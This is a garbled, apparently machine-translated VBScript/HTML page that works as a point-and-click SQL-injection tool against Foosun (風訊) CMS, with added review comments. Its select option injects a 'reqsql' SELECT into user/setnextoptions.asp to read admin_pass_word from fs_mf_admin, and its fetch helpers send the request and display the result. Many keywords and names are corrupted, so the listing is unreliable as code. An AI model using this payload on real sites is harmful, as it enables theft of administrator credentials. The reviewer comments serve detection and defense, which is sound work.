<ScriptLanguage =“ VBScript”>
' NOTE(review): this listing appears to be machine-translated; keywords and
' punctuation are garbled (e.g. "SupWindow_Onload", "endub"), so it is not
' runnable as shown. Presumably this was "Sub Window_Onload ... End Sub".
' Window load handler: resizes the window to 450x380 and moves it to 300,300.
SupWindow_Onload
Window.Resizeto450,380
Window.Moveto300,300
endub
</script>
<ScriptLanguage =“ VBScript”>
' Fetch-and-display helper (the garbled first and last lines presumably read
' "Function ... End Function"). Takes one argument, passes it to getBody,
' decodes the returned bytes through bytestobstr with the "gb2312" charset
' label, and writes the text into the element with id "url".
' NOTE(review): the name is spelled three different ways in this block
' (GetTtppage / gethtppage / gethttppage); that looks like transcription damage.
' NOTE(review): no element with id "url" is visible in this part of the page.
' The argument is used as the request target without any validation.
功能GetTtppage(路徑)
t = getBody(路徑)
gethtppage = bytestobstr(t,“ gb2312”)
' The response is assigned to innertext, i.e. as text rather than as markup.
document.getElementById(“ url”)。 innertext = gethttppage
最終功能
</script>
<ScriptLanguage =“ VBScript”>
' HTTP fetch helper. The declared name is garbled; the return assignment below
' and the call site use "getbody", so that is presumably the intended name.
' Creates a Microsoft.xmlhttp object, issues a GET to the url argument and
' returns the raw .Responsebody.
' NOTE(review): page script that instantiates Microsoft.xmlhttp through
' createObject is presumably only permitted in an HTA or a low-security
' legacy IE zone; a script host making outbound HTTP requests this way is
' worth flagging in endpoint telemetry.
functiongoby(url)
' Presumably "On Error Resume Next": runtime errors would be suppressed, so a
' failed request yields an empty result instead of an error.
Onorresumenext
setRetRieval = createObject(“ Microsoft.xmlhttp”)
' The next line and the single-character line further down presumably were
' "With Retrieval" ... "End With"; the leading-dot calls depend on that.
撤消
' Third argument is false, which requests a synchronous call; the two empty
' strings are the user and password arguments.
.open“ get”,url,false,“”,“”
。發送
getbody = .Responsebody
端
' Presumably releases the object ("Set ... = Nothing").
setRetRieval =沒有
最終功能
' Byte-to-text conversion helper: takes a byte body and a charset name, writes
' the bytes into an adodb.stream object, switches the stream to text mode with
' the given charset and returns the decoded text via readtext.
' NOTE(review): several member names are garbled in this listing
' ("writebody", "chareet"); presumably Write(body) and Charset.
功能bytestobstr(身體,CSET)
dimobjstream
setObjstream = createObject(“ adodb.stream”)
' type = 1 is the ADO binary stream type; mode = 3 is read/write.
objstream.type = 1
objstream.mode = 3
Objstream.open
objstream.writebody
' Rewind before changing the type so the whole buffer is re-read as text.
objstream.position = 0
' type = 2 is the ADO text stream type.
objstream.type = 2
objstream.chareet = CSET
bytestobstr = objstream.readtext
objstream.close
' Presumably releases the stream object ("Set ... = Nothing").
setObjstream =沒有
最終功能
</script>
<!-- NOTE(review): the select that follows concatenates this input's value with the selected option value and hands the result to the fetch helper unchecked. The visible option value puts a SELECT statement in the reqsql query parameter of user/setnextoptions.asp, reading admin_pass_word from fs_mf_admin. An endpoint that appears to execute SQL taken from the request should be removed or restricted server-side. Requests to this path that carry reqsql are a useful log and WAF detection signal, and admin credentials should be rotated if such requests show up in access logs. -->
<title> bylcx </title>
<!-- Base URL field; the default value is a placeholder host followed by the target path. -->
<inputId =“ urlcode” name =“ urlcode” size =“ 60” value =“ http://風訊 url/user/setnextoptions.asp”>
<selectid =“ sql” name =“ sql” onChange = vbs:gethttppage(document.getElementById(“ urlcode”)。value+document+document.getElementById(“ sql”)。value)>
<optionValue =“”>風訊sql版註入,shell的語句懶得寫了</option>
<optionValue =“?equvalue = 1&reqsql = select%201,admin_pass_word,3,4,5,6,7,8,9,10,11,112,12,13,14,15,15,16,17,19,19,221,221,223,223,223,25555 ,255,26,26,26,27,255,25,26,26,27,2 28,29,30,31,32,33,34,36,36,37,38,39,40,42,42,42,43,44,44,45,45,46,46,48,48,49,48,48,49,48,49,51%20 from%20fs_mf_admin%20 where%20 dhere%20ID = 1-1-1-1-1-1-1-1-1-1->>>